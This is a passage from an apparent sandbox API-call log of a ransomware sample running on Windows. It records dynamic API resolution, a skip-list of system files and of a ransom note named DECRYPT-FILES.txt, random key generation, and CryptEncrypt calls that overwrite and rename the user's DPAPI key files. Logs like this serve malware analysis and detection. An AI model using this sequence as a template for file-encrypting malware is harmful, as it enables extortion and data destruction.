(lpString="CREATEREMOTETHREAD") returned 18 [0078.390] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0078.390] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0078.390] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0078.390] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0078.391] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0078.391] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0078.391] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0078.391] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0078.391] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0078.391] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0078.391] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0078.391] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0078.391] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0078.391] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0078.391] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0078.391] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0078.391] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0078.391] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0078.391] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0078.391] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0078.391] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0078.391] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0078.391] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0078.391] lstrlenA (lpString="CREATETHREAD") returned 12 [0078.391] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0078.391] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0078.391] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0078.391] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0078.391] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0078.391] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0078.391] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0078.391] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0078.391] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0078.391] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0078.391] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0078.391] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0078.391] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0078.391] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0078.391] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0078.391] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0078.391] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0078.392] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0078.392] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0078.392] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0078.392] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0078.392] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0078.392] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0078.392] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0078.392] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0078.392] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0078.392] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0078.392] lstrlenA (lpString="CTRLROUTINE") returned 11 [0078.392] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0078.392] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0078.392] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0078.392] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0078.392] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0078.392] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0078.392] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0078.392] lstrlenA (lpString="DEBUGBREAK") returned 10 [0078.392] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0078.392] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0078.392] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0078.392] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0078.392] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0078.392] lstrlenA (lpString="DECODEPOINTER") returned 13 [0078.392] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0078.392] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0078.392] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0078.392] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0078.392] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0078.392] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0078.392] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0078.392] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0078.392] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0078.392] lstrlenA (lpString="DELETEATOM") returned 10 [0078.392] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0078.393] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0078.393] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0078.393] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0078.393] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0078.393] lstrlenA (lpString="DELETEFIBER") returned 11 [0078.393] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0078.393] lstrlenA (lpString="DELETEFILEA") returned 11 [0078.393] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0078.393] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0078.393] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0078.393] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0078.393] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0078.393] lstrlenA (lpString="DELETEFILEW") returned 11 [0078.393] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0078.393] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0078.393] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0078.393] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0078.393] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0078.393] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0078.393] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0078.393] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0078.393] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0078.393] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0078.393] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0078.393] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0078.393] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0078.393] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0078.393] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0078.393] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0078.393] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0078.393] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0078.393] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0078.393] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0078.393] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0078.393] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0078.394] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0078.394] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0078.394] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0078.394] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0078.394] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0078.394] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0078.394] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0078.394] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0078.394] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0078.394] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0078.394] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0078.394] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0078.394] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0078.394] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0078.394] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0078.394] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0078.394] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0078.394] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0078.394] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0078.394] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0078.394] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0078.394] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0078.394] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0078.394] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0078.394] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0078.394] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0078.394] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0078.394] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0078.394] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0078.394] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0078.394] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0078.394] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0078.394] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0078.394] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0078.394] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0078.394] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0078.394] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0078.395] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0078.395] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0078.395] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0078.395] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0078.395] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0078.395] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0078.395] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0078.395] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0078.395] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0078.395] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\2be989a0-16a1-424b-9211-51aa3bb43e5d") returned 147 [0078.395] wsprintfW (in: param_1=0x3f2d730, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\2be989a0-16a1-424b-9211-51aa3bb43e5d.JR60f") returned 153 [0078.395] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\2be989a0-16a1-424b-9211-51aa3bb43e5d" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\2be989a0-16a1-424b-9211-51aa3bb43e5d"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\2be989a0-16a1-424b-9211-51aa3bb43e5d.JR60f" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\2be989a0-16a1-424b-9211-51aa3bb43e5d.jr60f"), dwFlags=0x0) returned 1 [0078.396] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.396] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.396] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.396] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaadddf80, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaadddf80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaadddf80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0078.396] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0078.396] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x17ffec90, ftCreationTime.dwHighDateTime=0x1d3373c, ftLastAccessTime.dwLowDateTime=0x17ffec90, ftLastAccessTime.dwHighDateTime=0x1d3373c, ftLastWriteTime.dwLowDateTime=0x18024df0, ftLastWriteTime.dwHighDateTime=0x1d3373c, nFileSizeHigh=0x0, nFileSizeLow=0x1d4, dwReserved0=0x0, dwReserved1=0x0, cFileName="fbbe72db-afd8-443b-88dd-64b20388700d", cAlternateFileName="FBBE72~1")) returned 1 [0078.396] lstrcmpiW (lpString1="fbbe72db-afd8-443b-88dd-64b20388700d", lpString2="DECRYPT-FILES.txt") returned 1 [0078.397] lstrcmpiW (lpString1="fbbe72db-afd8-443b-88dd-64b20388700d", lpString2="autorun.inf") returned 1 [0078.397] lstrcmpiW (lpString1="fbbe72db-afd8-443b-88dd-64b20388700d", lpString2="boot.ini") returned 1 [0078.397] lstrcmpiW (lpString1="fbbe72db-afd8-443b-88dd-64b20388700d", lpString2="desktop.ini") returned 1 [0078.397] lstrcmpiW (lpString1="fbbe72db-afd8-443b-88dd-64b20388700d", lpString2="ntuser.dat") returned -1 [0078.397] lstrcmpiW (lpString1="fbbe72db-afd8-443b-88dd-64b20388700d", lpString2="iconcache.db") returned -1 [0078.397] lstrcmpiW (lpString1="fbbe72db-afd8-443b-88dd-64b20388700d", lpString2="bootsect.bak") returned 1 [0078.397] lstrcmpiW (lpString1="fbbe72db-afd8-443b-88dd-64b20388700d", lpString2="ntuser.dat.log") returned -1 [0078.397] lstrcmpiW (lpString1="fbbe72db-afd8-443b-88dd-64b20388700d", lpString2="thumbs.db") returned -1 [0078.397] lstrcmpiW (lpString1="fbbe72db-afd8-443b-88dd-64b20388700d", lpString2="Bootfont.bin") returned 1 [0078.397] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned 111 [0078.397] lstrlenW (lpString="fbbe72db-afd8-443b-88dd-64b20388700d") returned 36 [0078.397] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\" [0078.397] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpString2="fbbe72db-afd8-443b-88dd-64b20388700d" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fbbe72db-afd8-443b-88dd-64b20388700d") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fbbe72db-afd8-443b-88dd-64b20388700d" [0078.397] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.397] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fbbe72db-afd8-443b-88dd-64b20388700d" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\fbbe72db-afd8-443b-88dd-64b20388700d"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x458 [0078.397] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x3f2d6f8 | out: lpFileSize=0x3f2d6f8*=468) returned 1 [0078.397] CreateFileMappingW (hFile=0x458, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x45c [0078.398] MapViewOfFile (hFileMappingObject=0x45c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0078.400] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0078.400] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0078.400] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0078.401] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d660*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d660*=0x100) returned 1 [0078.401] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0078.401] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.401] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0078.402] CloseHandle (hObject=0x45c) returned 1 [0078.402] SetFilePointerEx (in: hFile=0x458, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.402] WriteFile (in: hFile=0x458, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d680, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d680*=0x108, lpOverlapped=0x0) returned 1 [0078.403] CloseHandle (hObject=0x0) returned 0 [0078.403] CloseHandle (hObject=0x458) returned 1 [0078.404] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.404] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.404] GetTickCount () returned 0x114c19b [0078.404] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.405] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0078.405] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0078.405] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0078.405] lstrlenA (lpString="kernel32.dll") returned 12 [0078.405] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0078.405] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0078.405] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0078.406] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0078.406] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0078.406] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0078.406] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0078.406] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddAtomA" | out: 